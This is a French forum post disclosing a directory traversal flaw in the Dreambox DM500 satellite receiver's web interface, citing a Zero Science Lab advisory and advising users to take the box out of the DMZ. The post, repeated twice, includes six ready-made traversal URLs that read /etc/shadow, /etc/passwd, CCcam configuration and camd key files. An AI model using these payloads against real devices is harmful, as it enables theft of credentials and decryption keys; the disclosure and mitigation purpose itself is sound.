bLuBx
DZSatien Impliqué
- Inscrit
- 7/8/10
- Messages
- 144
Salut tout le monde
une faille a été découvert dans le code de l'interface http de la dreambox
un directory transversal ou arbitrary file download
ciblé pour la DM500* ( mais 2 ou 3 autre version sont aussi vulnerable )
Alors cette faille n'est pas patcher , mais ne concerne que les idiots qui on leur port 80 ouvert sur le net
Donc c'est simple , on vire la dreambox du DMZ et on NAT que les port VRAIMENT utile (cccam par exemple)
ps: toutes les version de DM500* ou autre ne sont pas vulnerable ...
bye
une faille a été découvert dans le code de l'interface http de la dreambox
un directory transversal ou arbitrary file download
ciblé pour la DM500* ( mais 2 ou 3 autre version sont aussi vulnerable )
Code:
http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/etc/CCcam.cfg%00
http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/shadow%00
http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00
Advisory a dit:Advisory ID: ZSL-2011-5013Advisory
URL: http://www.zeroscience.mk/codes/dreambox_fd.txt
Alors cette faille n'est pas patcher , mais ne concerne que les idiots qui on leur port 80 ouvert sur le net
Donc c'est simple , on vire la dreambox du DMZ et on NAT que les port VRAIMENT utile (cccam par exemple)
ps: toutes les version de DM500* ou autre ne sont pas vulnerable ...
bye
Dernière édition: